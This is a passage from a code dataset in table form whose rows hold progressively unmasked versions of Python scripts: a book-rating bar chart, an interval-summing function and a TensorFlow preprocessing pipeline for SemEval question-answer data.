code
stringlengths 13
6.09M
| order_type
stringclasses 2
values | original_example
dict | step_ids
listlengths 1
5
|
|---|---|---|---|
import pandas as pd
import matplotlib.pyplot as plt
plt.rcParams['font.sans-serif'] = ['SimHei']
def get_ratings(file_path):
# 图书的ISBN中可能包含字符,所以在使用pandas读取文件时,需要指定编码
ratings = pd.read_table(file_path, header=0,
sep=';', encoding='ISO-8859-1')
print('前5条数据:\n{}\n'.format(ratings.head(5)))
print('总的数据条数:\n{}\n'.format(ratings.count()))
print('用户对图书的评分范围:<{},{}>\n'.format(
min(ratings['Book-Rating']), ratings['Book-Rating'].max()))
rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()
plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())
for x, y in zip(rateSer.keys(), rateSer.values):
plt.text(x, y+1, '%.0f' % y, ha='center', va='bottom', fontsize=9)
plt.xlabel('用户评分')
plt.ylabel('评分对应的人数')
plt.title('每种评分下对应的人数统计图')
plt.show()
if __name__ == "__main__":
get_ratings(file_path='BX-Book-Ratings.csv')
|
normal
|
{
"blob_id": "be5178f013e639d5179ed1af380dd7a63044bff2",
"index": 5636,
"step-1": "<mask token>\n\n\ndef get_ratings(file_path):\n ratings = pd.read_table(file_path, header=0, sep=';', encoding='ISO-8859-1'\n )\n print('前5条数据:\\n{}\\n'.format(ratings.head(5)))\n print('总的数据条数:\\n{}\\n'.format(ratings.count()))\n print('用户对图书的评分范围:<{},{}>\\n'.format(min(ratings['Book-Rating']),\n ratings['Book-Rating'].max()))\n rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()\n plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())\n for x, y in zip(rateSer.keys(), rateSer.values):\n plt.text(x, y + 1, '%.0f' % y, ha='center', va='bottom', fontsize=9)\n plt.xlabel('用户评分')\n plt.ylabel('评分对应的人数')\n plt.title('每种评分下对应的人数统计图')\n plt.show()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_ratings(file_path):\n ratings = pd.read_table(file_path, header=0, sep=';', encoding='ISO-8859-1'\n )\n print('前5条数据:\\n{}\\n'.format(ratings.head(5)))\n print('总的数据条数:\\n{}\\n'.format(ratings.count()))\n print('用户对图书的评分范围:<{},{}>\\n'.format(min(ratings['Book-Rating']),\n ratings['Book-Rating'].max()))\n rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()\n plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())\n for x, y in zip(rateSer.keys(), rateSer.values):\n plt.text(x, y + 1, '%.0f' % y, ha='center', va='bottom', fontsize=9)\n plt.xlabel('用户评分')\n plt.ylabel('评分对应的人数')\n plt.title('每种评分下对应的人数统计图')\n plt.show()\n\n\nif __name__ == '__main__':\n get_ratings(file_path='BX-Book-Ratings.csv')\n",
"step-3": "<mask token>\nplt.rcParams['font.sans-serif'] = ['SimHei']\n\n\ndef get_ratings(file_path):\n ratings = pd.read_table(file_path, header=0, sep=';', encoding='ISO-8859-1'\n )\n print('前5条数据:\\n{}\\n'.format(ratings.head(5)))\n print('总的数据条数:\\n{}\\n'.format(ratings.count()))\n print('用户对图书的评分范围:<{},{}>\\n'.format(min(ratings['Book-Rating']),\n ratings['Book-Rating'].max()))\n rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()\n plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())\n for x, y in zip(rateSer.keys(), rateSer.values):\n plt.text(x, y + 1, '%.0f' % y, ha='center', va='bottom', fontsize=9)\n plt.xlabel('用户评分')\n plt.ylabel('评分对应的人数')\n plt.title('每种评分下对应的人数统计图')\n plt.show()\n\n\nif __name__ == '__main__':\n get_ratings(file_path='BX-Book-Ratings.csv')\n",
"step-4": "import pandas as pd\nimport matplotlib.pyplot as plt\nplt.rcParams['font.sans-serif'] = ['SimHei']\n\n\ndef get_ratings(file_path):\n ratings = pd.read_table(file_path, header=0, sep=';', encoding='ISO-8859-1'\n )\n print('前5条数据:\\n{}\\n'.format(ratings.head(5)))\n print('总的数据条数:\\n{}\\n'.format(ratings.count()))\n print('用户对图书的评分范围:<{},{}>\\n'.format(min(ratings['Book-Rating']),\n ratings['Book-Rating'].max()))\n rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()\n plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())\n for x, y in zip(rateSer.keys(), rateSer.values):\n plt.text(x, y + 1, '%.0f' % y, ha='center', va='bottom', fontsize=9)\n plt.xlabel('用户评分')\n plt.ylabel('评分对应的人数')\n plt.title('每种评分下对应的人数统计图')\n plt.show()\n\n\nif __name__ == '__main__':\n get_ratings(file_path='BX-Book-Ratings.csv')\n",
"step-5": "import pandas as pd\nimport matplotlib.pyplot as plt\n\nplt.rcParams['font.sans-serif'] = ['SimHei']\n\n\ndef get_ratings(file_path):\n # 图书的ISBN中可能包含字符,所以在使用pandas读取文件时,需要指定编码\n ratings = pd.read_table(file_path, header=0,\n sep=';', encoding='ISO-8859-1')\n print('前5条数据:\\n{}\\n'.format(ratings.head(5)))\n print('总的数据条数:\\n{}\\n'.format(ratings.count()))\n print('用户对图书的评分范围:<{},{}>\\n'.format(\n min(ratings['Book-Rating']), ratings['Book-Rating'].max()))\n rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()\n plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())\n for x, y in zip(rateSer.keys(), rateSer.values):\n plt.text(x, y+1, '%.0f' % y, ha='center', va='bottom', fontsize=9)\n plt.xlabel('用户评分')\n plt.ylabel('评分对应的人数')\n plt.title('每种评分下对应的人数统计图')\n plt.show()\n\n\nif __name__ == \"__main__\":\n get_ratings(file_path='BX-Book-Ratings.csv')\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def sumIntervals(input):
interval = set()
if len(input) > 0:
for data in input:
if len(data) == 2 and data[0] < data[1]:
for i in range(data[0], data[1]):
interval.add(i)
else:
return 1
return len(interval)
else:
return 0
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def sumIntervals(input):
interval = set()
if len(input) > 0:
for data in input:
if len(data) == 2 and data[0] < data[1]:
for i in range(data[0], data[1]):
interval.add(i)
else:
return 1
return len(interval)
else:
return 0
sumIntervals([[1, 2], [6, 10], [11, 15]])
|
flexible
|
{
"blob_id": "25434fccff4401df2cebc9b0c4d0231f056b4e81",
"index": 6346,
"step-1": "<mask token>\n",
"step-2": "def sumIntervals(input):\n interval = set()\n if len(input) > 0:\n for data in input:\n if len(data) == 2 and data[0] < data[1]:\n for i in range(data[0], data[1]):\n interval.add(i)\n else:\n return 1\n return len(interval)\n else:\n return 0\n\n\n<mask token>\n",
"step-3": "def sumIntervals(input):\n interval = set()\n if len(input) > 0:\n for data in input:\n if len(data) == 2 and data[0] < data[1]:\n for i in range(data[0], data[1]):\n interval.add(i)\n else:\n return 1\n return len(interval)\n else:\n return 0\n\n\nsumIntervals([[1, 2], [6, 10], [11, 15]])\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import tensorflow as tf
import random
from tqdm import tqdm
import spacy
import ujson as json
from collections import Counter
import numpy as np
import os.path
nlp = spacy.blank("en")
def word_tokenize(sent):
doc = nlp(sent)
return [token.text for token in doc]
def convert_idx(text, tokens):
current = 0
spans = []
for token in tokens:
current = text.find(token, current)
if current < 0:
print("Token {} cannot be found".format(token))
raise Exception()
spans.append((current, current + len(token)))
current += len(token)
return spans
def process_file(filename, data_type, word_counter, char_counter, shuffle=False):
print("Generating {} examples...".format(data_type))
examples = []
eval_examples = {}
total = 0
with open(filename, "r") as fh:
for l in fh:
ques, ans, label = l.strip().split("\t")
ques_tokens = word_tokenize(ques)
ques_chars = [list(token) for token in ques_tokens]
ans_tokens = word_tokenize(ans)
ans_chars = [list(token) for token in ans_tokens]
label = int(label)
total += 1
for token in ques_tokens:
word_counter[token.lower()] += 1
for char in token:
char_counter[char] += 1
for token in ans_tokens:
word_counter[token.lower()] += 1
for char in token:
char_counter[char] += 1
example = {"ans_tokens": ans_tokens,
"ans_chars": ans_chars, "ques_tokens": ques_tokens,
"ques_chars": ques_chars, "y":label, "id": total}
examples.append(example)
if random:
random.shuffle(examples)
print("{} questions in total".format(len(examples)))
return examples
def get_embedding(counter, data_type, limit=-1, emb_file=None, size=None, vec_size=None, token2idx_dict=None):
print("Generating {} embedding...".format(data_type))
embedding_dict = {}
filtered_elements = [k for k, v in counter.items() if v > limit]
if emb_file is not None:
assert size is not None
assert vec_size is not None
with open(emb_file, "r", encoding="utf-8") as fh:
for line in tqdm(fh, total=size):
array = line.split()
word = "".join(array[0:-vec_size])
vector = list(map(float, array[-vec_size:]))
if word in counter and counter[word] > limit:
embedding_dict[word] = vector
print("{} / {} tokens have corresponding {} embedding vector".format(
len(embedding_dict), len(filtered_elements), data_type))
else:
assert vec_size is not None
for token in filtered_elements:
embedding_dict[token] = [np.random.normal(
scale=0.01) for _ in range(vec_size)]
print("{} tokens have corresponding embedding vector".format(
len(filtered_elements)))
NULL = "--NULL--"
OOV = "--OOV--"
token2idx_dict = {token: idx for idx, token in enumerate(
embedding_dict.keys(), 2)} if token2idx_dict is None else token2idx_dict
token2idx_dict[NULL] = 0
token2idx_dict[OOV] = 1
embedding_dict[NULL] = [0. for _ in range(vec_size)]
embedding_dict[OOV] = [0. for _ in range(vec_size)]
idx2emb_dict = {idx: embedding_dict[token]
for token, idx in token2idx_dict.items()}
emb_mat = [idx2emb_dict[idx] for idx in range(len(idx2emb_dict))]
return emb_mat, token2idx_dict
def build_features_SemEval(config, examples, data_type, out_file, word2idx_dict, char2idx_dict, is_test=False):
ans_limit = config.test_para_limit if is_test else config.para_limit
ques_limit = config.test_ques_limit if is_test else config.ques_limit
char_limit = config.char_limit
def filter_func(example, is_test=False):
return len(example["ans_tokens"]) > ans_limit or len(example["ques_tokens"]) > ques_limit
print("Processing {} examples...".format(data_type))
writer = tf.python_io.TFRecordWriter(out_file)
total = 0
total_ = 0
meta = {}
for example in tqdm(examples):
total_ += 1
#if filter_func(example, is_test):
# continue
total += 1
context_idxs = np.zeros([ans_limit], dtype=np.int32)
context_char_idxs = np.zeros([ans_limit, char_limit], dtype=np.int32)
ques_idxs = np.zeros([ques_limit], dtype=np.int32)
ques_char_idxs = np.zeros([ques_limit, char_limit], dtype=np.int32)
y = 0
def _get_word(word):
for each in (word, word.lower(), word.capitalize(), word.upper()):
if each in word2idx_dict:
return word2idx_dict[each]
return 1
def _get_char(char):
if char in char2idx_dict:
return char2idx_dict[char]
return 1
for i, token in enumerate(example["ans_tokens"][:ans_limit]):
context_idxs[i] = _get_word(token)
for i, token in enumerate(example["ques_tokens"][:ques_limit]):
ques_idxs[i] = _get_word(token)
for i, token in enumerate(example["ans_chars"][:ans_limit]):
for j, char in enumerate(token):
if j == char_limit:
break
context_char_idxs[i, j] = _get_char(char)
for i, token in enumerate(example["ques_chars"][:ques_limit]):
for j, char in enumerate(token):
if j == char_limit:
break
ques_char_idxs[i, j] = _get_char(char)
label = example["y"]
y = float(label)
record = tf.train.Example(features=tf.train.Features(feature={
"ans_idxs": tf.train.Feature(bytes_list=tf.train.BytesList(value=[context_idxs.tostring()])),
"ques_idxs": tf.train.Feature(bytes_list=tf.train.BytesList(value=[ques_idxs.tostring()])),
"ans_char_idxs": tf.train.Feature(bytes_list=tf.train.BytesList(value=[context_char_idxs.tostring()])),
"ques_char_idxs": tf.train.Feature(bytes_list=tf.train.BytesList(value=[ques_char_idxs.tostring()])),
"y": tf.train.Feature(bytes_list=tf.train.BytesList(value=[np.array([y]).tostring()])),
"id": tf.train.Feature(int64_list=tf.train.Int64List(value=[example["id"]]))
}))
writer.write(record.SerializeToString())
print("Build {} / {} instances of features in total".format(total, total_))
meta["total"] = total
writer.close()
return meta
def save(filename, obj, message=None):
if message is not None:
print("Saving {}...".format(message))
with open(filename, "w") as fh:
json.dump(obj, fh)
def preproSemEval(config):
word_counter, char_counter = Counter(), Counter()
train_examples = process_file(
config.SemEval_train_file, "train", word_counter, char_counter, shuffle=True)
dev_examples = process_file(
config.SemEval_dev_file, "dev", word_counter, char_counter)
test_examples = process_file(
config.SemEval_test_file, "test", word_counter, char_counter)
word_emb_file = config.fasttext_file if config.fasttext else config.glove_word_file
char_emb_file = config.glove_char_file if config.pretrained_char else None
char_emb_size = config.glove_char_size if config.pretrained_char else None
char_emb_dim = config.glove_dim if config.pretrained_char else config.char_dim
word2idx_dict = None
if os.path.isfile(config.word2idx_file):
with open(config.word2idx_file, "r") as fh:
word2idx_dict = json.load(fh)
word_emb_mat, word2idx_dict = get_embedding(word_counter, "word", emb_file=word_emb_file,
size=config.glove_word_size, vec_size=config.glove_dim, token2idx_dict=word2idx_dict)
char2idx_dict = None
if os.path.isfile(config.char2idx_file):
with open(config.char2idx_file, "r") as fh:
char2idx_dict = json.load(fh)
char_emb_mat, char2idx_dict = get_embedding(
char_counter, "char", emb_file=char_emb_file, size=char_emb_size, vec_size=char_emb_dim, token2idx_dict=char2idx_dict)
build_features_SemEval(config, train_examples, "train",
config.train_record_file, word2idx_dict, char2idx_dict)
dev_meta = build_features_SemEval(config, dev_examples, "dev",
config.dev_record_file, word2idx_dict, char2idx_dict)
test_meta = build_features_SemEval(config, test_examples, "test",
config.test_record_file, word2idx_dict, char2idx_dict, is_test=True)
save(config.word_emb_file, word_emb_mat, message="word embedding")
save(config.char_emb_file, char_emb_mat, message="char embedding")
save(config.dev_meta, dev_meta, message="dev meta")
save(config.word2idx_file, word2idx_dict, message="word2idx")
save(config.char2idx_file, char2idx_dict, message="char2idx")
save(config.test_meta, test_meta, message="test meta")
save("data/test.json", dev_examples, message="test example")
|
normal
|
{
"blob_id": "5cd9d4fe9889c4d53b50d86fa78ae84d0c242536",
"index": 3693,
"step-1": "<mask token>\n\n\ndef convert_idx(text, tokens):\n current = 0\n spans = []\n for token in tokens:\n current = text.find(token, current)\n if current < 0:\n print('Token {} cannot be found'.format(token))\n raise Exception()\n spans.append((current, current + len(token)))\n current += len(token)\n return spans\n\n\ndef process_file(filename, data_type, word_counter, char_counter, shuffle=False\n ):\n print('Generating {} examples...'.format(data_type))\n examples = []\n eval_examples = {}\n total = 0\n with open(filename, 'r') as fh:\n for l in fh:\n ques, ans, label = l.strip().split('\\t')\n ques_tokens = word_tokenize(ques)\n ques_chars = [list(token) for token in ques_tokens]\n ans_tokens = word_tokenize(ans)\n ans_chars = [list(token) for token in ans_tokens]\n label = int(label)\n total += 1\n for token in ques_tokens:\n word_counter[token.lower()] += 1\n for char in token:\n char_counter[char] += 1\n for token in ans_tokens:\n word_counter[token.lower()] += 1\n for char in token:\n char_counter[char] += 1\n example = {'ans_tokens': ans_tokens, 'ans_chars': ans_chars,\n 'ques_tokens': ques_tokens, 'ques_chars': ques_chars, 'y':\n label, 'id': total}\n examples.append(example)\n if random:\n random.shuffle(examples)\n print('{} questions in total'.format(len(examples)))\n return examples\n\n\n<mask token>\n\n\ndef build_features_SemEval(config, examples, data_type, out_file,\n word2idx_dict, char2idx_dict, is_test=False):\n ans_limit = config.test_para_limit if is_test else config.para_limit\n ques_limit = config.test_ques_limit if is_test else config.ques_limit\n char_limit = config.char_limit\n\n def filter_func(example, is_test=False):\n return len(example['ans_tokens']) > ans_limit or len(example[\n 'ques_tokens']) > ques_limit\n print('Processing {} examples...'.format(data_type))\n writer = tf.python_io.TFRecordWriter(out_file)\n total = 0\n total_ = 0\n meta = {}\n for example in tqdm(examples):\n total_ += 1\n total += 1\n context_idxs = np.zeros([ans_limit], dtype=np.int32)\n context_char_idxs = np.zeros([ans_limit, char_limit], dtype=np.int32)\n ques_idxs = np.zeros([ques_limit], dtype=np.int32)\n ques_char_idxs = np.zeros([ques_limit, char_limit], dtype=np.int32)\n y = 0\n\n def _get_word(word):\n for each in (word, word.lower(), word.capitalize(), word.upper()):\n if each in word2idx_dict:\n return word2idx_dict[each]\n return 1\n\n def _get_char(char):\n if char in char2idx_dict:\n return char2idx_dict[char]\n return 1\n for i, token in enumerate(example['ans_tokens'][:ans_limit]):\n context_idxs[i] = _get_word(token)\n for i, token in enumerate(example['ques_tokens'][:ques_limit]):\n ques_idxs[i] = _get_word(token)\n for i, token in enumerate(example['ans_chars'][:ans_limit]):\n for j, char in enumerate(token):\n if j == char_limit:\n break\n context_char_idxs[i, j] = _get_char(char)\n for i, token in enumerate(example['ques_chars'][:ques_limit]):\n for j, char in enumerate(token):\n if j == char_limit:\n break\n ques_char_idxs[i, j] = _get_char(char)\n label = example['y']\n y = float(label)\n record = tf.train.Example(features=tf.train.Features(feature={\n 'ans_idxs': tf.train.Feature(bytes_list=tf.train.BytesList(\n value=[context_idxs.tostring()])), 'ques_idxs': tf.train.\n Feature(bytes_list=tf.train.BytesList(value=[ques_idxs.tostring\n ()])), 'ans_char_idxs': tf.train.Feature(bytes_list=tf.train.\n BytesList(value=[context_char_idxs.tostring()])),\n 'ques_char_idxs': tf.train.Feature(bytes_list=tf.train.\n BytesList(value=[ques_char_idxs.tostring()])), 'y': tf.train.\n Feature(bytes_list=tf.train.BytesList(value=[np.array([y]).\n tostring()])), 'id': tf.train.Feature(int64_list=tf.train.\n Int64List(value=[example['id']]))}))\n writer.write(record.SerializeToString())\n print('Build {} / {} instances of features in total'.format(total, total_))\n meta['total'] = total\n writer.close()\n return meta\n\n\ndef save(filename, obj, message=None):\n if message is not None:\n print('Saving {}...'.format(message))\n with open(filename, 'w') as fh:\n json.dump(obj, fh)\n\n\ndef preproSemEval(config):\n word_counter, char_counter = Counter(), Counter()\n train_examples = process_file(config.SemEval_train_file, 'train',\n word_counter, char_counter, shuffle=True)\n dev_examples = process_file(config.SemEval_dev_file, 'dev',\n word_counter, char_counter)\n test_examples = process_file(config.SemEval_test_file, 'test',\n word_counter, char_counter)\n word_emb_file = (config.fasttext_file if config.fasttext else config.\n glove_word_file)\n char_emb_file = config.glove_char_file if config.pretrained_char else None\n char_emb_size = config.glove_char_size if config.pretrained_char else None\n char_emb_dim = (config.glove_dim if config.pretrained_char else config.\n char_dim)\n word2idx_dict = None\n if os.path.isfile(config.word2idx_file):\n with open(config.word2idx_file, 'r') as fh:\n word2idx_dict = json.load(fh)\n word_emb_mat, word2idx_dict = get_embedding(word_counter, 'word',\n emb_file=word_emb_file, size=config.glove_word_size, vec_size=\n config.glove_dim, token2idx_dict=word2idx_dict)\n char2idx_dict = None\n if os.path.isfile(config.char2idx_file):\n with open(config.char2idx_file, 'r') as fh:\n char2idx_dict = json.load(fh)\n char_emb_mat, char2idx_dict = get_embedding(char_counter, 'char',\n emb_file=char_emb_file, size=char_emb_size, vec_size=char_emb_dim,\n token2idx_dict=char2idx_dict)\n build_features_SemEval(config, train_examples, 'train', config.\n train_record_file, word2idx_dict, char2idx_dict)\n dev_meta = build_features_SemEval(config, dev_examples, 'dev', config.\n dev_record_file, word2idx_dict, char2idx_dict)\n test_meta = build_features_SemEval(config, test_examples, 'test',\n config.test_record_file, word2idx_dict, char2idx_dict, is_test=True)\n save(config.word_emb_file, word_emb_mat, message='word embedding')\n save(config.char_emb_file, char_emb_mat, message='char embedding')\n save(config.dev_meta, dev_meta, message='dev meta')\n save(config.word2idx_file, word2idx_dict, message='word2idx')\n save(config.char2idx_file, char2idx_dict, message='char2idx')\n save(config.test_meta, test_meta, message='test meta')\n save('data/test.json', dev_examples, message='test example')\n",
"step-2": "<mask token>\n\n\ndef convert_idx(text, tokens):\n current = 0\n spans = []\n for token in tokens:\n current = text.find(token, current)\n if current < 0:\n print('Token {} cannot be found'.format(token))\n raise Exception()\n spans.append((current, current + len(token)))\n current += len(token)\n return spans\n\n\ndef process_file(filename, data_type, word_counter, char_counter, shuffle=False\n ):\n print('Generating {} examples...'.format(data_type))\n examples = []\n eval_examples = {}\n total = 0\n with open(filename, 'r') as fh:\n for l in fh:\n ques, ans, label = l.strip().split('\\t')\n ques_tokens = word_tokenize(ques)\n ques_chars = [list(token) for token in ques_tokens]\n ans_tokens = word_tokenize(ans)\n ans_chars = [list(token) for token in ans_tokens]\n label = int(label)\n total += 1\n for token in ques_tokens:\n word_counter[token.lower()] += 1\n for char in token:\n char_counter[char] += 1\n for token in ans_tokens:\n word_counter[token.lower()] += 1\n for char in token:\n char_counter[char] += 1\n example = {'ans_tokens': ans_tokens, 'ans_chars': ans_chars,\n 'ques_tokens': ques_tokens, 'ques_chars': ques_chars, 'y':\n label, 'id': total}\n examples.append(example)\n if random:\n random.shuffle(examples)\n print('{} questions in total'.format(len(examples)))\n return examples\n\n\ndef get_embedding(counter, data_type, limit=-1, emb_file=None, size=None,\n vec_size=None, token2idx_dict=None):\n print('Generating {} embedding...'.format(data_type))\n embedding_dict = {}\n filtered_elements = [k for k, v in counter.items() if v > limit]\n if emb_file is not None:\n assert size is not None\n assert vec_size is not None\n with open(emb_file, 'r', encoding='utf-8') as fh:\n for line in tqdm(fh, total=size):\n array = line.split()\n word = ''.join(array[0:-vec_size])\n vector = list(map(float, array[-vec_size:]))\n if word in counter and counter[word] > limit:\n embedding_dict[word] = vector\n print('{} / {} tokens have corresponding {} embedding vector'.\n format(len(embedding_dict), len(filtered_elements), data_type))\n else:\n assert vec_size is not None\n for token in filtered_elements:\n embedding_dict[token] = [np.random.normal(scale=0.01) for _ in\n range(vec_size)]\n print('{} tokens have corresponding embedding vector'.format(len(\n filtered_elements)))\n NULL = '--NULL--'\n OOV = '--OOV--'\n token2idx_dict = {token: idx for idx, token in enumerate(embedding_dict\n .keys(), 2)} if token2idx_dict is None else token2idx_dict\n token2idx_dict[NULL] = 0\n token2idx_dict[OOV] = 1\n embedding_dict[NULL] = [(0.0) for _ in range(vec_size)]\n embedding_dict[OOV] = [(0.0) for _ in range(vec_size)]\n idx2emb_dict = {idx: embedding_dict[token] for token, idx in\n token2idx_dict.items()}\n emb_mat = [idx2emb_dict[idx] for idx in range(len(idx2emb_dict))]\n return emb_mat, token2idx_dict\n\n\ndef build_features_SemEval(config, examples, data_type, out_file,\n word2idx_dict, char2idx_dict, is_test=False):\n ans_limit = config.test_para_limit if is_test else config.para_limit\n ques_limit = config.test_ques_limit if is_test else config.ques_limit\n char_limit = config.char_limit\n\n def filter_func(example, is_test=False):\n return len(example['ans_tokens']) > ans_limit or len(example[\n 'ques_tokens']) > ques_limit\n print('Processing {} examples...'.format(data_type))\n writer = tf.python_io.TFRecordWriter(out_file)\n total = 0\n total_ = 0\n meta = {}\n for example in tqdm(examples):\n total_ += 1\n total += 1\n context_idxs = np.zeros([ans_limit], dtype=np.int32)\n context_char_idxs = np.zeros([ans_limit, char_limit], dtype=np.int32)\n ques_idxs = np.zeros([ques_limit], dtype=np.int32)\n ques_char_idxs = np.zeros([ques_limit, char_limit], dtype=np.int32)\n y = 0\n\n def _get_word(word):\n for each in (word, word.lower(), word.capitalize(), word.upper()):\n if each in word2idx_dict:\n return word2idx_dict[each]\n return 1\n\n def _get_char(char):\n if char in char2idx_dict:\n return char2idx_dict[char]\n return 1\n for i, token in enumerate(example['ans_tokens'][:ans_limit]):\n context_idxs[i] = _get_word(token)\n for i, token in enumerate(example['ques_tokens'][:ques_limit]):\n ques_idxs[i] = _get_word(token)\n for i, token in enumerate(example['ans_chars'][:ans_limit]):\n for j, char in enumerate(token):\n if j == char_limit:\n break\n context_char_idxs[i, j] = _get_char(char)\n for i, token in enumerate(example['ques_chars'][:ques_limit]):\n for j, char in enumerate(token):\n if j == char_limit:\n break\n ques_char_idxs[i, j] = _get_char(char)\n label = example['y']\n y = float(label)\n record = tf.train.Example(features=tf.train.Features(feature={\n 'ans_idxs': tf.train.Feature(bytes_list=tf.train.BytesList(\n value=[context_idxs.tostring()])), 'ques_idxs': tf.train.\n Feature(bytes_list=tf.train.BytesList(value=[ques_idxs.tostring\n ()])), 'ans_char_idxs': tf.train.Feature(bytes_list=tf.train.\n BytesList(value=[context_char_idxs.tostring()])),\n 'ques_char_idxs': tf.train.Feature(bytes_list=tf.train.\n BytesList(value=[ques_char_idxs.tostring()])), 'y': tf.train.\n Feature(bytes_list=tf.train.BytesList(value=[np.array([y]).\n tostring()])), 'id': tf.train.Feature(int64_list=tf.train.\n Int64List(value=[example['id']]))}))\n writer.write(record.SerializeToString())\n print('Build {} / {} instances of features in total'.format(total, total_))\n meta['total'] = total\n writer.close()\n return meta\n\n\ndef save(filename, obj, message=None):\n if message is not None:\n print('Saving {}...'.format(message))\n with open(filename, 'w') as fh:\n json.dump(obj, fh)\n\n\ndef preproSemEval(config):\n word_counter, char_counter = Counter(), Counter()\n train_examples = process_file(config.SemEval_train_file, 'train',\n word_counter, char_counter, shuffle=True)\n dev_examples = process_file(config.SemEval_dev_file, 'dev',\n word_counter, char_counter)\n test_examples = process_file(config.SemEval_test_file, 'test',\n word_counter, char_counter)\n word_emb_file = (config.fasttext_file if config.fasttext else config.\n glove_word_file)\n char_emb_file = config.glove_char_file if config.pretrained_char else None\n char_emb_size = config.glove_char_size if config.pretrained_char else None\n char_emb_dim = (config.glove_dim if config.pretrained_char else config.\n char_dim)\n word2idx_dict = None\n if os.path.isfile(config.word2idx_file):\n with open(config.word2idx_file, 'r') as fh:\n word2idx_dict = json.load(fh)\n word_emb_mat, word2idx_dict = get_embedding(word_counter, 'word',\n emb_file=word_emb_file, size=config.glove_word_size, vec_size=\n config.glove_dim, token2idx_dict=word2idx_dict)\n char2idx_dict = None\n if os.path.isfile(config.char2idx_file):\n with open(config.char2idx_file, 'r') as fh:\n char2idx_dict = json.load(fh)\n char_emb_mat, char2idx_dict = get_embedding(char_counter, 'char',\n emb_file=char_emb_file, size=char_emb_size, vec_size=char_emb_dim,\n token2idx_dict=char2idx_dict)\n build_features_SemEval(config, train_examples, 'train', config.\n train_record_file, word2idx_dict, char2idx_dict)\n dev_meta = build_features_SemEval(config, dev_examples, 'dev', config.\n dev_record_file, word2idx_dict, char2idx_dict)\n test_meta = build_features_SemEval(config, test_examples, 'test',\n config.test_record_file, word2idx_dict, char2idx_dict, is_test=True)\n save(config.word_emb_file, word_emb_mat, message='word embedding')\n save(config.char_emb_file, char_emb_mat, message='char embedding')\n save(config.dev_meta, dev_meta, message='dev meta')\n save(config.word2idx_file, word2idx_dict, message='word2idx')\n save(config.char2idx_file, char2idx_dict, message='char2idx')\n save(config.test_meta, test_meta, message='test meta')\n save('data/test.json', dev_examples, message='test example')\n",
"step-3": "<mask token>\n\n\ndef word_tokenize(sent):\n doc = nlp(sent)\n return [token.text for token in doc]\n\n\ndef convert_idx(text, tokens):\n current = 0\n spans = []\n for token in tokens:\n current = text.find(token, current)\n if current < 0:\n print('Token {} cannot be found'.format(token))\n raise Exception()\n spans.append((current, current + len(token)))\n current += len(token)\n return spans\n\n\ndef process_file(filename, data_type, word_counter, char_counter, shuffle=False\n ):\n print('Generating {} examples...'.format(data_type))\n examples = []\n eval_examples = {}\n total = 0\n with open(filename, 'r') as fh:\n for l in fh:\n ques, ans, label = l.strip().split('\\t')\n ques_tokens = word_tokenize(ques)\n ques_chars = [list(token) for token in ques_tokens]\n ans_tokens = word_tokenize(ans)\n ans_chars = [list(token) for token in ans_tokens]\n label = int(label)\n total += 1\n for token in ques_tokens:\n word_counter[token.lower()] += 1\n for char in token:\n char_counter[char] += 1\n for token in ans_tokens:\n word_counter[token.lower()] += 1\n for char in token:\n char_counter[char] += 1\n example = {'ans_tokens': ans_tokens, 'ans_chars': ans_chars,\n 'ques_tokens': ques_tokens, 'ques_chars': ques_chars, 'y':\n label, 'id': total}\n examples.append(example)\n if random:\n random.shuffle(examples)\n print('{} questions in total'.format(len(examples)))\n return examples\n\n\ndef get_embedding(counter, data_type, limit=-1, emb_file=None, size=None,\n vec_size=None, token2idx_dict=None):\n print('Generating {} embedding...'.format(data_type))\n embedding_dict = {}\n filtered_elements = [k for k, v in counter.items() if v > limit]\n if emb_file is not None:\n assert size is not None\n assert vec_size is not None\n with open(emb_file, 'r', encoding='utf-8') as fh:\n for line in tqdm(fh, total=size):\n array = line.split()\n word = ''.join(array[0:-vec_size])\n vector = list(map(float, array[-vec_size:]))\n if word in counter and counter[word] > limit:\n embedding_dict[word] = vector\n print('{} / {} tokens have corresponding {} embedding vector'.\n format(len(embedding_dict), len(filtered_elements), data_type))\n else:\n assert vec_size is not None\n for token in filtered_elements:\n embedding_dict[token] = [np.random.normal(scale=0.01) for _ in\n range(vec_size)]\n print('{} tokens have corresponding embedding vector'.format(len(\n filtered_elements)))\n NULL = '--NULL--'\n OOV = '--OOV--'\n token2idx_dict = {token: idx for idx, token in enumerate(embedding_dict\n .keys(), 2)} if token2idx_dict is None else token2idx_dict\n token2idx_dict[NULL] = 0\n token2idx_dict[OOV] = 1\n embedding_dict[NULL] = [(0.0) for _ in range(vec_size)]\n embedding_dict[OOV] = [(0.0) for _ in range(vec_size)]\n idx2emb_dict = {idx: embedding_dict[token] for token, idx in\n token2idx_dict.items()}\n emb_mat = [idx2emb_dict[idx] for idx in range(len(idx2emb_dict))]\n return emb_mat, token2idx_dict\n\n\ndef build_features_SemEval(config, examples, data_type, out_file,\n word2idx_dict, char2idx_dict, is_test=False):\n ans_limit = config.test_para_limit if is_test else config.para_limit\n ques_limit = config.test_ques_limit if is_test else config.ques_limit\n char_limit = config.char_limit\n\n def filter_func(example, is_test=False):\n return len(example['ans_tokens']) > ans_limit or len(example[\n 'ques_tokens']) > ques_limit\n print('Processing {} examples...'.format(data_type))\n writer = tf.python_io.TFRecordWriter(out_file)\n total = 0\n total_ = 0\n meta = {}\n for example in tqdm(examples):\n total_ += 1\n total += 1\n context_idxs = np.zeros([ans_limit], 